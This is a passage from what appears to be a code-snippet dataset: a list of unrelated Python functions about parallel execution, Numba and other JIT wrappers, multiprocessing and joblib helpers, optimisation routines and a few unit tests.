1\n try_again = False\n if self.npfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.npfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n except:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n\n if self.nfunc.get(atypes, True):\n try:\n ret = self.numba_func(*args, **kwargs)\n self.nfunc[atypes] = True\n dprint(3, \"Numba attempt succeeded.\")\n return ret\n except numba.core.errors.TypingError as te:\n print(\"Ramba TypingError:\", te, type(te))\n self.npfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n except:\n self.nfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n raise\n\n return self.func(*args, **kwargs)", "def jit(func):\n return func", "def conditional_jit(_func=None, **kwargs):\n if _func is None:\n return lambda fn: functools.wraps(fn)(maybe_numba_fn(fn, **kwargs))\n else:\n lazy_numba = maybe_numba_fn(_func, **kwargs)\n return functools.wraps(_func)(lazy_numba)", "def vectorize_par(\n f: Callable, inputs: Iterable,\n pool: Pool = None, processes=None, chunksize=1,\n nout=None, otypes: Union[Sequence[Type], Type] = None,\n use_starmap=True, meshgrid_input=True,\n) -> Tuple[Union[Mapping[Any, Any], np.ndarray, Sequence[Any]], ...]:\n if isinstance(inputs, dict):\n raise NotImplementedError()\n # s = dict(signature(f).parameters)\n # ks, ds = zip(*[(k, v.default) for k, v in s.items()])\n # inputs = [inputs[k] if k in inputs else arrayobj1d([d]) for k, d in zip(ks, ds)]\n\n if meshgrid_input:\n inputs = [\n inp if (isinstance(inp, np.ndarray) and type(inp[0]) is object)\n else (arrayobj1d(inp) if is_iter(inp)\n else arrayobj1d([inp]))\n for inp in inputs]\n shape0 = [len(inp) for inp in inputs]\n mesh_inputs = np.meshgrid(*inputs, indexing='ij') # type: Iterable[np.ndarray]\n else:\n inputs = [arrayobj1d([inp]) if not is_iter(inp) else inp for inp in inputs]\n shape0 = broadcast_shapes(*[npy(v).shape for v in inputs])\n mesh_inputs = [np.broadcast_to(v, shape0) for v in inputs]\n mesh_inputs = [m.flatten() for m in mesh_inputs]\n\n m = zip(*mesh_inputs)\n m = [m1 for m1 in m]\n\n if pool is None:\n pool = Pool(processes=processes) # type: PoolParallel\n\n # if processes == 0:\n # use_starmap = False\n\n if chunksize is None:\n # NOTE: this doesn't seem to work well, unlike chunksize=1.\n # Need further experiment.\n chunksize = np.max([\n int(np.floor(np.prod(shape0) / pool._processes)),\n 1\n ])\n\n if use_starmap:\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError from starmap! Trying again..')\n # Just try again - this seems to fix the issue\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError again after trying again.. '\n 'Not trying again this time.')\n raise\n else:\n outs = pool.map(f, m, chunksize=chunksize)\n\n if nout is None:\n if otypes is not None and is_sequence(otypes):\n nout = len(otypes)\n else:\n try:\n nout = len(outs[0])\n except TypeError:\n nout = 1\n\n if otypes is None:\n otypes = [object] * nout\n elif not is_sequence(type(otypes)):\n otypes = [otypes] * nout\n\n # NOTE: deliberately keeping outs, outs1, and outs2 for debugging.\n # After confirming everything works well, rename all to \"outs\"\n # to save memory.\n # DEF: outs1[argout][i_input_flattened]\n if nout > 1:\n outs1 = zip(*outs)\n else:\n if use_starmap:\n outs1 = [outs]\n else:\n # Reverse the action of map() putting each output in a list\n outs1 = [[out1[0] for out1 in outs]]\n\n # --- outs2: reshape to inputs' dimensions\n # DEF: outs2[argout][i_input1, i_input2, ...]\n outs2 = [arrayobj1d(out).reshape(shape0) for out in outs1]\n\n # --- outs3: set to a correct otype\n # DEF: outs3[argout][i_input1, i_input2, ...]\n outs3 = [cell2mat(out, otype) if otype not in [object, object]\n else out\n for out, otype in zip(outs2, otypes)]\n return tuple(outs3)", "def default_numba_nopython_pipeline(state, pm):\n if state.func_ir is None:\n pm.add_pass(TranslateByteCode, \"analyzing bytecode\")\n pm.add_pass(FixupArgs, \"fix up args\")\n pm.add_pass(IRProcessing, \"processing IR\")\n pm.add_pass(WithLifting, \"Handle with contexts\")\n\n # this pass adds required logic to overload default implementation of\n # Numpy functions\n pm.add_pass(DPPLAddNumpyOverloadPass, \"dppl add typing template for Numpy functions\")\n\n # Add pass to ensure when users are allocating static\n # constant memory the size is a constant and can not\n # come from a closure variable\n pm.add_pass(DPPLConstantSizeStaticLocalMemoryPass, \"dppl constant size for static local memory\")\n\n # pre typing\n if not state.flags.no_rewrites:\n pm.add_pass(RewriteSemanticConstants, \"rewrite semantic constants\")\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n pm.add_pass(GenericRewrites, \"nopython rewrites\")\n\n pm.add_pass(InlineClosureLikes,\n \"inline calls to locally defined closures\")\n # convert any remaining closures into functions\n pm.add_pass(MakeFunctionToJitFunction,\n \"convert make_function into JIT functions\")\n # inline functions that have been determined as inlinable and rerun\n # branch pruning, this needs to be run after closures are inlined as\n # the IR repr of a closure masks call sites if an inlinable is called\n # inside a closure\n pm.add_pass(InlineInlinables, \"inline inlinable functions\")\n if not state.flags.no_rewrites:\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n\n pm.add_pass(FindLiterallyCalls, \"find literally calls\")\n pm.add_pass(LiteralUnroll, \"handles literal_unroll\")\n\n if state.flags.enable_ssa:\n pm.add_pass(ReconstructSSA, \"ssa\")\n # typing\n pm.add_pass(NopythonTypeInference, \"nopython frontend\")\n pm.add_pass(AnnotateTypes, \"annotate types\")\n\n # strip phis\n pm.add_pass(PreLowerStripPhis, \"remove phis nodes\")\n\n # optimisation\n pm.add_pass(InlineOverloads, \"inline overloaded functions\")", "def __call__(self, par_dict: dict) -> np.ndarray:", "def vectorize(func, processes=1, on_complete=None):\n if processes > 1:\n return __multiprocess_wrapper(func, processes, on_complete)\n else:\n return single_process_wrapper(func, on_complete)", "def job_as_parameter(f):\n f.job_as_parameter = True\n return f", "def _seed_numba(seed):\n np.random.seed(seed)", "def Optimise(LogLikelihood,par,func_args,fixed=None,type='max',method='NM',maxiter=10000, maxfun=10000, verbose=True):\n \n if fixed==None:\n var_par = np.copy(par)\n #otherwise construct the parameter vector from var_par and fixed_par_val\n else:\n par = np.array(par)\n fixed = np.array(fixed) #ensure fixed is a np array\n #assign parameters to normal param vector\n fixed_par = par[np.where(fixed==True)]\n var_par = par[np.where(fixed!=True)]\n \n #set the algorithm to use - CG and P not working (at least not well)\n add_kwords = {'verbose':verbose}\n if method == 'NM':\n Algorithm = NelderMead\n add_kwords = {'maxiter':maxiter, 'maxfun':maxfun,'verbose':verbose}\n elif method == 'CG':\n print \"warning: CG method didn't work properly during testing\"\n Algorithm = ConjugateGradient\n elif method == 'P':\n print \"warning: Powell algorithm didn't work properly during testing\"\n Algorithm = Powell\n else:\n print \"error: optimisation function not found\"\n return par\n \n #set the optimisation function to pos or neg for the fmin funcitons\n if type == 'max': OptFunc = NegFixedPar_func\n elif type == 'min': OptFunc = FixedPar_func\n else:\n print \"error: %s not a valid option\" % type\n return par\n \n #call the optimser with the appropriate function\n fitted_par = Algorithm(OptFunc, var_par, (LogLikelihood,func_args,fixed,fixed_par), \\\n **add_kwords)\n \n #now return the params in the correct order...\n if fixed==None:\n return_par = fitted_par\n else:\n return_par = np.copy(par) \n return_par[np.where(fixed!=True)] = fitted_par\n \n return return_par", "def _run_job(args):\n # Note that we do not set the seed of the random number generator because\n # we already modified the interaction matrix before calling this function\n # and it does not harm us when all sub processes have the same sequence of\n # random numbers.\n \n # create the object ...\n obj = LibraryBinaryNumeric(**args[0])\n # ... get the method to evaluate ...\n method = getattr(obj, args[1])\n # ... and evaluate it\n if len(args) > 2:\n return method(**args[2])\n else:\n return method()", "def progress_wrapper(user_defined_function: Callable, master_workers_queue: multiprocessing.Queue, index: int, chunk_size: int) -> Callable:\n ...", "def generate_numba_table_func(\n func: Callable[..., np.ndarray],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_table(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ):\n result = np.empty((len(begin), values.shape[1]))\n min_periods_mask = np.empty(result.shape)\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window), axis=0)\n sub_result = numba_func(window, *args)\n nan_mask = len(window) - count_nan >= minimum_periods\n min_periods_mask[i, :] = nan_mask\n result[i, :] = sub_result\n result = np.where(min_periods_mask, result, np.nan)\n return result\n\n return roll_table", "def _dummy_jit(*args, **kwargs):\n\n def wrapper(f):\n return f\n\n def marker(*args, **kwargs):\n return marker\n\n if (\n len(args) > 0\n and (args[0] is marker or not callable(args[0]))\n or len(kwargs) > 0\n ):\n return wrapper\n elif len(args) == 0:\n return wrapper\n else:\n return args[0]", "def parfor(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=\"threading\", func_args=[], func_kwargs={}):\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n if engine == \"joblib\":\n p = joblib.Parallel(n_jobs=n_jobs, backend=backend)\n d = joblib.delayed(func)\n d_l = []\n for in_element in in_list:\n d_l.append(d(in_element, *func_args, **func_kwargs))\n results = p(d_l)\n\n elif engine == \"dask\":\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n p = partial(func, *func_args, **func_kwargs)\n d = [dask.delayed(p)(i) for i in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*d, get=dask.multiprocessing.get,\n workers=n_jobs)\n elif backend == \"threading\":\n results = dask.compute(*d, get=dask.threaded.get,\n workers=n_jobs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def default_helper_c_code_args():\r\n\r\n return {\r\n \"c_prefix\": \"PyArray\",\r\n \"strides_mul\": 1,\r\n }", "def test_workon_with_parallel_backend(self):\n\n def foo(x):\n return [dict(name=\"result\", type=\"objective\", value=x * 2)]\n\n import joblib\n\n with joblib.parallel_backend(\"loky\"):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=5, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 5\n\n with joblib.parallel_backend(\"loky\", n_jobs=-1):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=3, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 3", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def with_numpy(func):\r\n return func", "def test_default(self):\n varargs = ()\n kwargs = {}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 1)", "def do_partask(fn, jobs, _args=None, blocking=True,\n combfn=None, init=None,\n pass_idx=False,\n singleproc=False,\n manager=None,\n pass_queue=None,\n N=None):\n if singleproc or N == 1:\n moreargs = ()\n if pass_idx:\n moreargs += (0,)\n if pass_queue != None:\n moreargs += (pass_queue,)\n return fn(jobs, _args, *moreargs)\n\n if manager == None:\n print \"...creating new Manager...\"\n manager = multiprocessing.Manager()\n else:\n print \"...Received Your Manager, roger...\"\n queue = manager.Queue()\n\n p = multiprocessing.Process(target=spawn_jobs, args=(queue, fn, jobs, _args, pass_idx, pass_queue, N))\n p.start()\n\n num_jobs = len(jobs)\n if combfn == None:\n combfn = combfn_lst\n init = []\n elif combfn == 'dict':\n combfn = combfn_dict\n init = {}\n elif combfn == 'ignore':\n combfn = combfn_ignore\n init = True\n \n results = init\n while True:\n subresults = queue.get()\n if isinstance(subresults, POOL_CLOSED):\n return results\n results = combfn(results, subresults)\n return results", "def run_multiprocessing(args, function):\n vcf_fn = args.data_file\n num_processes = args.num_threads\n if num_processes > 1:\n # Split the VCF into chunks\n callset = allel.read_vcf(vcf_fn, fields=[\"variants/CHROM\", \"variants/POS\"])\n pos_list = callset[\"variants/POS\"]\n chroms = callset[\"variants/CHROM\"]\n assert np.all(chroms == chroms[0])\n chrom = str(chroms[0])\n\n def get_chromosome_chunks(lst, num_processes):\n length = len(lst)\n n = math.ceil(length / num_processes)\n chunks = list()\n for index, i in enumerate(range(0, length, n)):\n if index != num_processes - 1:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[i + n])),\n )\n )\n else:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[-1])),\n )\n )\n return chunks\n\n chunks = get_chromosome_chunks(pos_list, num_processes)\n chunks_iter = iter(chunks)\n reports = list()\n completed_files = list()\n with multiprocessing.Pool(processes=num_processes, maxtasksperchild=10) as pool:\n for index, row in enumerate(pool.map(function, chunks_iter)):\n reports.append(row)\n print(\n \"Processed Chunk {}: {} with {} sites added.\".format(\n index, chunks[index][2], row[\"num_sites\"]\n )\n )\n if row[\"num_sites\"] > 0:\n completed_files.append(index)\n else:\n os.remove(args.output_file + str(index) + \"-lock\")\n\n # Combine reports and print\n master_report = reports[0]\n for report in reports[1:]:\n for var_type, val in report.items():\n master_report[var_type] += val\n print(master_report)\n\n # Combine sampledata files\n filenames = completed_files\n all_samples = []\n for name in filenames:\n all_samples.append(tsinfer.load(args.output_file + str(name)))\n os.remove(args.output_file + str(name))\n\n samples = all_samples[0].copy(args.output_file)\n samples.append_sites(*all_samples[1:])\n samples.finalise()\n assert np.all(np.diff(samples.sites_position[:]) > 0)\n\n else:\n raise ValueError", "def joblib_batch_evaluator(\n func,\n arguments,\n *,\n n_cores=N_CORES,\n error_handling=\"continue\",\n unpack_symbol=None,\n):\n _check_inputs(func, arguments, n_cores, error_handling, unpack_symbol)\n n_cores = int(n_cores) if int(n_cores) >= 2 else 1\n\n reraise = error_handling == \"raise\"\n\n @unpack(symbol=unpack_symbol)\n @catch(default=\"__traceback__\", reraise=reraise)\n def internal_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n if n_cores == 1:\n res = [internal_func(arg) for arg in arguments]\n else:\n res = Parallel(n_jobs=n_cores)(delayed(internal_func)(arg) for arg in arguments)\n\n return res", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def fmin(func, x0, args=(), kw=dict(), xtol=1e-4, ftol=1e-4, maxiter=None, maxfun=None,\n full_output=0, disp=1, retall=0, callback=None, zdelt = 0.00025, nonzdelt = 0.05, \n holdfixed=None):\n # 2011-04-13 14:26 IJMC: Adding Keyword option\n # 2011-05-11 10:48 IJMC: Added the zdelt and nonzdelt options\n # 2011-05-30 15:36 IJMC: Added the holdfixed option\n\n def wrap_function(function, args, **kw):\n ncalls = [0]\n def function_wrapper(x):\n ncalls[0] += 1\n return function(x, *args, **kw)\n return ncalls, function_wrapper\n\n # Set up holdfixed arrays\n if holdfixed is not None:\n holdfixed = np.array(holdfixed)\n #x0[holdfixed] = x0[holdfixed]\n holdsome = True\n else:\n holdsome = False\n #holdfixed = np.zeros(params.size, dtype=bool)\n \n #if holdsome:\n # print \"holdfixed>>\", holdfixed\n\n fcalls, func = wrap_function(func, args, **kw)\n x0 = np.asfarray(x0).flatten()\n xoriginal = x0.copy()\n N = len(x0)\n rank = len(x0.shape)\n if not -1 < rank < 2:\n raise ValueError, \"Initial guess must be a scalar or rank-1 sequence.\"\n if maxiter is None:\n maxiter = N * 200\n if maxfun is None:\n maxfun = N * 200\n\n rho = 1; chi = 2; psi = 0.5; sigma = 0.5;\n one2np1 = range(1,N+1)\n\n if rank == 0:\n sim = np.zeros((N+1,), dtype=x0.dtype)\n else:\n sim = np.zeros((N+1,N), dtype=x0.dtype)\n fsim = np.zeros((N+1,), float)\n sim[0] = x0\n if retall:\n allvecs = [sim[0]]\n #print func.__name__\n #print x0\n fsim[0] = func(x0)\n for k in range(0,N):\n y = np.array(x0,copy=True)\n if y[k] != 0:\n y[k] = (1+nonzdelt)*y[k]\n else:\n y[k] = zdelt\n if holdsome and k in holdfixed:\n y[k] = xoriginal[k]\n sim[k+1] = y\n f = func(y)\n fsim[k+1] = f\n\n ind = np.argsort(fsim)\n fsim = np.take(fsim,ind,0)\n # sort so sim[0,:] has the lowest function value\n sim = np.take(sim,ind,0)\n\n iterations = 1\n\n while (fcalls[0] < maxfun and iterations < maxiter):\n ### IJC Edit to understand fmin!\n ##print 'xtol>> ' + str(max(np.ravel(abs(sim[1:]-sim[0])))) + ' > ' + str(xtol)\n ##print 'ftol>> ' + str(max(abs(fsim[0]-fsim[1:]))) + ' > ' + str(ftol)\n if (max(np.ravel(abs(sim[1:]-sim[0]))) <= xtol \\\n and max(abs(fsim[0]-fsim[1:])) <= ftol):\n break\n\n xbar = np.add.reduce(sim[:-1],0) / N\n xr = (1+rho)*xbar - rho*sim[-1]\n if holdsome:\n xr[holdfixed] = xoriginal[holdfixed]\n fxr = func(xr)\n doshrink = 0\n\n if fxr < fsim[0]:\n xe = (1+rho*chi)*xbar - rho*chi*sim[-1]\n if holdsome:\n xe[holdfixed] = xoriginal[holdfixed]\n fxe = func(xe)\n\n if fxe < fxr:\n sim[-1] = xe\n fsim[-1] = fxe\n else:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fsim[0] <= fxr\n if fxr < fsim[-2]:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fxr >= fsim[-2]\n # Perform contraction\n if fxr < fsim[-1]:\n xc = (1+psi*rho)*xbar - psi*rho*sim[-1]\n if holdsome:\n xc[holdfixed] = xoriginal[holdfixed]\n fxc = func(xc)\n\n if fxc <= fxr:\n sim[-1] = xc\n fsim[-1] = fxc\n else:\n doshrink=1\n else:\n # Perform an inside contraction\n xcc = (1-psi)*xbar + psi*sim[-1]\n if holdsome:\n xcc[holdfixed] = xoriginal[holdfixed]\n fxcc = func(xcc)\n\n if fxcc < fsim[-1]:\n sim[-1] = xcc\n fsim[-1] = fxcc\n else:\n doshrink = 1\n\n if doshrink:\n for j in one2np1:\n sim[j] = sim[0] + sigma*(sim[j] - sim[0])\n if holdsome:\n sim[j, holdfixed] = xoriginal[holdfixed]\n fsim[j] = func(sim[j])\n\n ind = np.argsort(fsim)\n sim = np.take(sim,ind,0)\n fsim = np.take(fsim,ind,0)\n if callback is not None:\n callback(sim[0])\n iterations += 1\n if retall:\n allvecs.append(sim[0])\n\n x = sim[0]\n fval = min(fsim)\n warnflag = 0\n\n if fcalls[0] >= maxfun:\n warnflag = 1\n if disp:\n print \"Warning: Maximum number of function evaluations has \"\\\n \"been exceeded.\"\n elif iterations >= maxiter:\n warnflag = 2\n if disp:\n print \"Warning: Maximum number of iterations has been exceeded\"\n else:\n if disp:\n print \"Optimization terminated successfully.\"\n print \" Current function value: %f\" % fval\n print \" Iterations: %d\" % iterations\n print \" Function evaluations: %d\" % fcalls[0]\n\n\n if full_output:\n retlist = x, fval, iterations, fcalls[0], warnflag\n if retall:\n retlist += (allvecs,)\n else:\n retlist = x\n if retall:\n retlist = (x, allvecs)\n\n return retlist", "def applymap_nb(a, map_func_nb, *args):\n out = np.full_like(a, np.nan, dtype=np.float_)\n\n for col in range(out.shape[1]):\n idxs = np.flatnonzero(~np.isnan(a[:, col]))\n for i in idxs:\n out[i, col] = map_func_nb(i, col, a[i, col], *args)\n return out", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def _init_matrix(matrices, transform_func, default_val):\n if matrices is None:\n return default_val\n return transform_func(matrices)", "def _apply_defaults(func, args, kwargs):\n\n sig = signature(func)\n bound_arguments = sig.bind(*args, **kwargs)\n for param in sig.parameters.values():\n if param.name not in bound_arguments.arguments:\n bound_arguments.arguments[param.name] = param.default\n args = [bound_arguments.arguments[key] for key in sig.parameters.keys()]\n return args, {}", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def numba_check():\n numba = importlib.util.find_spec(\"numba\")\n return numba is not None", "def jit(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n def wrap_mindspore(func):\n if hash_args:\n hash_obj = _get_jit_hash(hash_args)\n else:\n hash_obj = int(time.time() * 1e9)\n\n @wraps(func)\n def staging_specialize(*args, **kwargs):\n if os.getenv(\"MS_JIT\") == '0':\n return func(*args, **kwargs)\n\n args, kwargs = _handle_func_args(func, *args, **kwargs)\n\n process_obj = None\n if args and not isinstance(args[0], PythonTensor) and hasattr(args[0], func.__name__):\n process_obj = args[0]\n # only the function or cell instance wrapped by shard will fall into this branch\n if _is_pynative_parallel() and func.__name__ == _PYNATIVE_PARALLEL_FUNC_NAME:\n process_obj = hash_args\n out = _MindsporeFunctionExecutor(func, hash_obj, input_signature, process_obj, jit_config)(*args, **kwargs)\n return out\n\n return staging_specialize\n\n if fn is not None:\n return wrap_mindspore(fn)\n return wrap_mindspore", "def parfor(fn, niters, fixed_args = (), ee = shared_exec_engine):\n assert isinstance(fn, Function), \\\n \"Can only run LLVM functions, not %s\" % type(fn)\n \n # in case fixed arguments aren't yet GenericValues, convert them\n fixed_args = tuple(gv_from_python(v, arg.type) \n for (v,arg) in \n zip(fixed_args, fn.args))\n iter_ranges, steps, shape = parse_iters(niters)\n result_lltype = return_type(fn) \n if result_lltype == ty_void:\n work_fn = parfor_wrapper(fn, steps)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return \n else:\n assert is_llvm_float_type(result_lltype) or is_llvm_int_type(result_lltype)\n dtype = lltype_to_dtype(result_lltype)\n result_array = np.empty(shape = shape, dtype = dtype)\n fixed_args = (GenericValue.pointer(result_array.ctypes.data),) + fixed_args\n work_fn = parfor_wrapper(fn, steps, shape)\n n_given = len(fixed_args) + 2*len(steps)\n n_expected = len(work_fn.args)\n assert n_given == n_expected, \\\n \"Work function expects %d arguments but got %d\" % (n_expected, n_given)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return result_array\n assert False, \"Collecting results not yet implemented\"", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def test_increment_input_with_threads():\r\n a = [0]\r\n Parallel(n_jobs=2, backend=\"threading\")(\r\n delayed(increment_input)(a) for _ in range(5))\r\n nose.tools.assert_equal(a, [5])", "def __init__(self, defaults={}, data=None):\n\n super().__init__(\n defaults={**OptimizationParameters.parameters, **defaults}, data=data\n )", "def EM_numba(F,G,Y0,T=100,N=500000):\n\n Y0 = np.array(Y0)\n Y = np.zeros((Y0.shape[0],N+1))\n Y[:,0]=Y0\n dt = T/N\n t=np.linspace(0,T,N+1)\n\n for jt in range(0,N):\n Y[:,jt+1]=_EM_step(F,G,Y[:,jt],dt)\n\n return t,Y", "def __call__(self, *args, **kwargs):\n # TODO: figure out how to check if we are using a jobserver-supporting ninja,\n # the two split ninja packages make this very difficult right now\n parallel = should_set_parallel_jobs(jobserver_support=True) and kwargs.pop(\n \"parallel\", self.jobs > 1\n )\n\n if parallel:\n args = (\"-j{0}\".format(self.jobs),) + args\n jobs_env = kwargs.pop(\"jobs_env\", None)\n if jobs_env:\n # Caller wants us to set an environment variable to\n # control the parallelism.\n kwargs[\"extra_env\"] = {jobs_env: str(self.jobs)}\n\n return super(MakeExecutable, self).__call__(*args, **kwargs)", "def compute(args, fun, max_workers=6):\n print(\"\\nProcessing symbols in parallel\")\n ex = futures.ThreadPoolExecutor(max_workers=max_workers)\n ex.map(fun, args)", "def parallelize(func: callable, iterable, func_args: tuple=None, func_kwargs: dict=None, njobs=None, no_progress=False, **pbar_kw):\n if func_args is None:\n func_args = ()\n if func_kwargs is None:\n func_kwargs = {}\n njobs = get_njobs(njobs)\n\n if 'total' not in pbar_kw:\n try:\n n = len(iterable)\n pbar_kw['total'] = n\n except TypeError:\n pass\n\n delayed = joblib.delayed\n\n if no_progress or not HAS_TQDM:\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n else:\n with tqdm_joblib(**pbar_kw):\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n return res", "def parallel_calculation(self, serial_fun, init_config, **kwargs):\r\n burned_in_config = self.burn_in(init_config, **kwargs)\r\n num_processes = 1\r\n if platform in ('linux', 'linux2'):\r\n num_processes = kwargs.get('num_processes', mp.cpu_count())\r\n if num_processes > 1:\r\n output = mp.Queue()\r\n\r\n def fun(seed, output):\r\n output.put(\r\n serial_fun(\r\n burned_in_config,\r\n urng=np.random.RandomState(seed).random, **kwargs\r\n )\r\n )\r\n\r\n processes = [\r\n mp.Process(target=fun, args=(seed, output))\r\n for seed in np.random.randint(88, size=num_processes)\r\n ]\r\n for p in processes:\r\n p.start()\r\n for p in processes:\r\n p.join()\r\n process_results = [output.get() for p in processes]\r\n return np.mean(process_results)\r\n return serial_fun(burned_in_config, **kwargs)", "def _chunk_vmapped_function(vmapped_fun, chunk_size, argnums=0):\n\n if chunk_size is None:\n return vmapped_fun\n\n if isinstance(argnums, int):\n argnums = (argnums,)\n\n def _fun(*args):\n\n n_elements = jax.tree_leaves(args[argnums[0]])[0].shape[0]\n n_chunks, n_rest = divmod(n_elements, chunk_size)\n\n if n_chunks == 0 or chunk_size >= n_elements:\n y = vmapped_fun(*args)\n else:\n # split inputs\n def _get_chunks(x):\n x_chunks = jax.tree_map(lambda x_: x_[: n_elements - n_rest, ...], x)\n x_chunks = _chunk(x_chunks, 